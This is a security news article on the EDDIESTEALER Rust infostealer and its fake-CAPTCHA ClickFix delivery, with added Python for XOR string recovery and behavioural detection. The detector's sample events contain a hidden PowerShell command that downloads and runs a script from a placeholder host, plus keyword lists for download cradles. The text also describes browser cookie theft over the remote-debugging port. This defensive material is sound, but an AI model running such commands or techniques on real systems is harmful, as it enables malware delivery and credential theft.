SecurityBrief Asia - Technology news for CISOs & cybersecurity decision-makers

EDDIESTEALER Rust malware mimics CAPTCHA to steal credentials

Thu, 5th Jun 2025

Elastic Security Labs has identified a new Rust-based infostealer, EDDIESTEALER, distributed through fake CAPTCHA verification pages designed to deceive users and deploy credential-harvesting malware.

According to research by Elastic Security Labs, EDDIESTEALER is disseminated via adversary-controlled web domains using deceptive CAPTCHA interfaces that mimic legitimate verification systems. These fake CAPTCHAs are crafted to look like genuine prompts, including phrases such as "Verify you are a human" or "I'm not a robot", blending into compromised websites or phishing campaigns to increase their credibility with unsuspecting users.

The observed initial infection vector is a compromised website hosting an obfuscated React-based JavaScript payload that presents a fake "I'm not a robot" page. When the user clicks through, the page silently writes a malicious PowerShell command to the clipboard with document.execCommand("copy"), a deprecated but still widely supported browser API that raises no clipboard permission prompt when called from a user gesture. On-page instructions then tell the user to open the Windows Run dialog, paste, and press Enter, the social-engineering pattern commonly referred to as ClickFix. The pasted command downloads a second-stage payload, gverify.js, from attacker infrastructure.

gverify.js is itself obfuscated JavaScript. Its job is to fetch the main EDDIESTEALER executable from the attacker domain and save it to the user's Downloads folder under a pseudorandom name. The script is run by cscript in a hidden window and launches the stealer from there, so the victim sees no visible sign of activity.

EDDIESTEALER is written in Rust, which researchers say contributes to its stealth and difficulty in analysis compared to C-based malware. "This adoption of Rust in malware development reflects a growing trend among threat actors seeking to leverage modern language features for enhanced stealth, stability, and resilience against traditional analysis workflows and threat detection engines. A seemingly simple infostealer written in Rust often requires more dedicated analysis efforts compared to its C/C++ counterpart, owing to factors such as zero-cost abstractions, Rust's type system, compiler optimisations, and inherent difficulties in analysing memory-safe binaries," stated researchers from Elastic Security Labs.

The malware employs several obfuscation and anti-analysis techniques. Critical strings are stored encrypted with a simple XOR cipher; each string has its own key-derivation routine and is decrypted inline at the point of use rather than in bulk at startup. Symbols are stripped, which slows static analysis; the researchers note that signature tooling such as rustbinsign, which generates function signatures for the Rust standard library and common crates, helps recover library function names in stripped Rust binaries. Each sample also uses a unique mutex, named with a UUID that is itself stored encrypted, to ensure only one instance runs at a time.
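As an added illustration (not Elastic's code and not EDDIESTEALER's), the Python below implements repeating-key XOR string obfuscation with a hypothetical per-string key schedule, together with the analyst-side known-plaintext recovery: a guessable fragment such as a browser profile path yields the key bytes directly, after which the whole string decrypts without first reversing the key-derivation routine. The derive_key function, the seed value, the key length and the sample string are assumptions made for this example.

```python
"""Repeating-key XOR string obfuscation and known-plaintext key recovery.
Added example; derive_key is a hypothetical key schedule, not EDDIESTEALER's."""


def derive_key(seed: int, length: int) -> bytes:
    """Hypothetical per-string key schedule: an LCG seeded with a per-string
    constant. Illustrative stand-in for a malware-specific derivation routine."""
    out = bytearray()
    state = seed & 0xFFFFFFFF
    for _ in range(length):
        state = (state * 1103515245 + 12345) & 0xFFFFFFFF
        out.append((state >> 16) & 0xFF)
    return bytes(out)


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key (the 'simple XOR cipher' the text describes)."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encrypt_string(plaintext: str, seed: int, key_len: int = 8) -> bytes:
    """Build-time side: obfuscate one string under its own derived key."""
    return xor_bytes(plaintext.encode(), derive_key(seed, key_len))


def decrypt_string(blob: bytes, seed: int, key_len: int = 8) -> str:
    """Runtime side: inline decryption at the point of use."""
    return xor_bytes(blob, derive_key(seed, key_len)).decode()


def recover_key(blob: bytes, crib: bytes, key_len: int):
    """Analyst side: known-plaintext attack on repeating-key XOR.

    If a plaintext fragment (the crib) at least key_len bytes long is known,
    sliding it across the blob yields, at the right offset, every key byte
    (ciphertext XOR crib). A candidate is kept only when its key reproduces the
    full crib and the whole decrypted string is printable ASCII.
    Returns a list of (offset, key, plaintext) tuples.
    """
    if len(crib) < key_len:
        raise ValueError("crib must be at least key_len bytes")
    results = []
    for offset in range(len(blob) - len(crib) + 1):
        key = bytearray(key_len)
        for j in range(key_len):
            key[(offset + j) % key_len] = blob[offset + j] ^ crib[j]
        plaintext = xor_bytes(blob, bytes(key))
        if (plaintext[offset:offset + len(crib)] == crib
                and all(32 <= c < 127 for c in plaintext)):
            results.append((offset, bytes(key), plaintext.decode()))
    return results


# Constructed sample: a browser profile path of the kind an infostealer targets.
SAMPLE_STRING = r"\Google\Chrome\User Data\Default\Login Data"
SAMPLE_SEED = 0x1337  # assumed per-string seed for the example
SAMPLE_BLOB = encrypt_string(SAMPLE_STRING, SAMPLE_SEED)

if __name__ == "__main__":
    print(decrypt_string(SAMPLE_BLOB, SAMPLE_SEED))
    for offset, key, text in recover_key(SAMPLE_BLOB, rb"\Chrome\User Data", key_len=8):
        print(f"offset={offset} key={key.hex()} -> {text}")
```

The recovery only works because the key is shorter than the string and repeats; if a per-string key is as long as the string itself, a crib recovers only the bytes it covers, and the practical route is to lift the key-derivation routine from the binary and re-implement it, which is what the dedicated per-string derivation described above forces an analyst to do.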

EDDIESTEALER also performs a simple sandbox check: it requires at least 4.0 GB of available system memory and self-deletes if the threshold is not met, on the assumption that analysis VMs are provisioned with less. Self-deletion uses the NTFS alternate-data-stream trick seen previously in other malware families: the running executable's primary data stream is renamed into an alternate stream, after which the file can be marked for deletion despite the lock Windows holds on a running image. The memory check is cheap to defeat: give the sandbox more than 4 GB of RAM.

On execution the malware decrypts its configuration data and contacts its command-and-control (C2) server using a URI pattern that carries a unique identifier used for build tracking. The configuration comes back over plain HTTP rather than HTTPS, AES-CBC-encrypted and Base64-encoded, and contains a session ID, a list of exfiltration tasks, communication keys and a self-delete flag. The data EDDIESTEALER collects spans credentials, browser data, cryptocurrency wallets, and files from password managers, messaging applications and FTP clients; the exact targets and paths are defined by the C2 server and can be changed by operators without shipping a new sample. Because the transport is unencrypted, the Base64 blob is visible to network inspection even though its contents cannot be read without the AES key.

"The decrypted configuration for this sample contains the following in JSON format: Session ID; List of tasks (data to target); AES key for client-to-server message encryption; Self-delete flag," Elastic Security Labs stated in their technical analysis. The researchers also provided detailed lists of file paths and applications targeted by the infostealer, including major crypto wallet and browser platforms, highlighting the breadth of potential victim impact.

A notable feature of EDDIESTEALER is its ability to read browser credentials even from Chromium versions that protect them with Application-bound encryption. Rather than attacking that encryption directly, the malware reimplements browser-specific logic from open-source tooling such as ChromeKatz in Rust, and spawns off-screen browser processes that it drives through the Chrome DevTools Protocol over a remote-debugging port, so that the browser itself decrypts cookies and credentials before they are extracted. "Since the introduction of Application-bound encryption, malware developers have adapted to alternative methods to bypass this protection and gain access to unencrypted sensitive data, such as cookies. ChromeKatz is one of the more well-received open source solutions that we have seen malware implement. EDDIESTEALER is no exception—the malware developers reimplemented it in Rust," explained researchers.

More recent EDDIESTEALER variants add capabilities such as collecting GPU information, running processes and CPU details, and they change the order of C2 communications: newer samples send system information to the server before requesting their configuration, and hardcoded AES keys have replaced the keys previously delivered by the C2 server. Newer samples also show more aggressive function inlining by LLVM, the compiler backend Rust uses, which makes it harder for analysts to isolate individual routines.

During analysis, Elastic Security Labs identified at least 15 EDDIESTEALER samples through code similarity and shared infrastructure. Infrastructure analysis linked the payloads to several C2 and intermediary domains, including llll[.]fit, shiglimugli[.]xyz and xxxivi[.]com (shown defanged), among others.

As detailed in the behavioural breakdown provided by Elastic Security Labs, EDDIESTEALER leverages established tactics and techniques as documented in the MITRE ATT&CK framework. These include initial access via phishing and content injection, command and scripting interpreters, user execution, exfiltration over C2 channels, credential access, and evasion strategies.

The research also offers analysis tips and describes the difficulties Rust introduces, such as stack-slot reuse and enum-based error handling, both of which complicate static disassembly and binary examination. Rust "panic" metadata left in the binary, which records the source file paths of panic locations, helps segment the code and map functions to specific malware modules, provided that metadata was not stripped at build time.

Elastic Security Labs released YARA rules, as well as behavioural prevention signatures, to aid security professionals in detecting EDDIESTEALER activity. This includes rules for suspicious PowerShell executions, browser data discovery, ingress tool transfers via PowerShell, and the potential self-deletion of running executables.
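The Python below is an added example of the kind of behavioural logic such rules encode, written for this page and not Elastic's published rules. It walks constructed process-creation events (not real telemetry; the key=value format, the process IDs and the command lines are assumptions) and flags the chain described earlier: a PowerShell download cradle launched from the Windows shell, a script host running a file out of a user-writable directory, an executable started from Downloads by that script host, and a Chromium browser started with a remote-debugging port by a non-browser parent.

```python
"""Behavioural detections for the ClickFix delivery chain and the
remote-debugging browser access described above. Added example, not Elastic's
rules; the event format and sample events are constructed for illustration."""
import ntpath
import re

# Constructed process-creation events in a simplified key=value format
# (fields modelled on common EDR telemetry; not captured from a real host).
SAMPLE_EVENTS = r"""
ts=1 pid=100 ppid=1 image=C:\Windows\explorer.exe cmdline="C:\Windows\explorer.exe"
ts=2 pid=200 ppid=100 image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell -w hidden -c iwr http://example.invalid/gverify.js -OutFile $env:TEMP\gverify.js; cscript //nologo $env:TEMP\gverify.js"
ts=3 pid=300 ppid=200 image=C:\Windows\System32\cscript.exe cmdline="cscript //nologo C:\Users\u\AppData\Local\Temp\gverify.js"
ts=4 pid=400 ppid=300 image=C:\Users\u\Downloads\a8f3k2q.exe cmdline="C:\Users\u\Downloads\a8f3k2q.exe"
ts=5 pid=500 ppid=400 image=C:\Program Files\Google\Chrome\Application\chrome.exe cmdline="chrome.exe --remote-debugging-port=9222 --window-position=-32000,-32000 --user-data-dir=C:\Users\u\AppData\Local\Google\Chrome\User Data"
ts=6 pid=600 ppid=100 image=C:\Program Files\Google\Chrome\Application\chrome.exe cmdline="chrome.exe"
"""

EVENT_RE = re.compile(r'^ts=(\d+) pid=(\d+) ppid=(\d+) image=(.+?) cmdline="(.*)"$')
SHELLS = {"powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "chromium.exe", "opera.exe"}
DOWNLOAD_HINTS = ("iwr ", "invoke-webrequest", "downloadstring", "downloadfile",
                  "net.webclient", "curl ", "http://", "https://")
HIDDEN_HINTS = ("-w hidden", "-w h ", "windowstyle hidden")
USER_WRITABLE = ("\\downloads\\", "\\appdata\\local\\temp\\", "\\temp\\", "\\public\\")


def parse_events(text: str) -> dict:
    """Parse event lines into {pid: event}; lines that do not match are skipped."""
    events = {}
    for line in text.strip().splitlines():
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        ts, pid, ppid, image, cmdline = m.groups()
        events[int(pid)] = {
            "ts": int(ts), "pid": int(pid), "ppid": int(ppid), "image": image,
            "name": ntpath.basename(image).lower(), "cmdline": cmdline,
        }
    return events


def ancestry(events: dict, pid: int) -> list:
    """Process names from pid up to the root, e.g. ['cscript.exe', 'powershell.exe', 'explorer.exe']."""
    chain, seen = [], set()
    while pid in events and pid not in seen:
        seen.add(pid)
        chain.append(events[pid]["name"])
        pid = events[pid]["ppid"]
    return chain


def detect(events: dict) -> list:
    """Return (rule_name, pid, ancestry) for every event that matches a rule."""
    alerts = []
    for ev in sorted(events.values(), key=lambda e: e["ts"]):
        name, cmd, image = ev["name"], ev["cmdline"].lower(), ev["image"].lower()
        parent = events.get(ev["ppid"])
        pname = parent["name"] if parent else ""
        chain = ancestry(events, ev["pid"])

        # 1. Ingress tool transfer: a PowerShell download cradle spawned by the
        #    shell (what a Run-dialog paste looks like) or started with a hidden window.
        if name in SHELLS and any(h in cmd for h in DOWNLOAD_HINTS) and (
                pname == "explorer.exe" or any(h in cmd for h in HIDDEN_HINTS)):
            alerts.append(("powershell_ingress_tool_transfer", ev["pid"], chain))

        # 2. Windows Script Host executing a script from a user-writable directory.
        if name in SCRIPT_HOSTS and any(d in cmd for d in USER_WRITABLE):
            alerts.append(("script_host_user_writable_script", ev["pid"], chain))

        # 3. A script host launching an executable dropped in Downloads.
        if pname in SCRIPT_HOSTS and "\\downloads\\" in image:
            alerts.append(("script_host_spawned_downloaded_exe", ev["pid"], chain))

        # 4. A Chromium browser started with remote debugging by a non-browser parent:
        #    the DevTools Protocol route to cookies and logins the browser has already decrypted.
        if name in BROWSERS and "--remote-debugging-port" in cmd and pname not in BROWSERS:
            alerts.append(("browser_remote_debugging_by_non_browser", ev["pid"], chain))
    return alerts


if __name__ == "__main__":
    for rule, pid, chain in detect(parse_events(SAMPLE_EVENTS)):
        print(f"{rule}: pid={pid} chain={' <- '.join(chain)}")
```

Rule 4 is the noisiest of the four in practice: developers and browser-automation frameworks start browsers with --remote-debugging-port legitimately, so a production version should exclude known automation parents (and the browser's own updater) rather than alert on the flag alone. Rules 1 to 3 are much stronger when correlated through the ancestry they report, since an Explorer-spawned PowerShell that leads to a script host and then to an executable in Downloads is the whole delivery chain in one tree.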
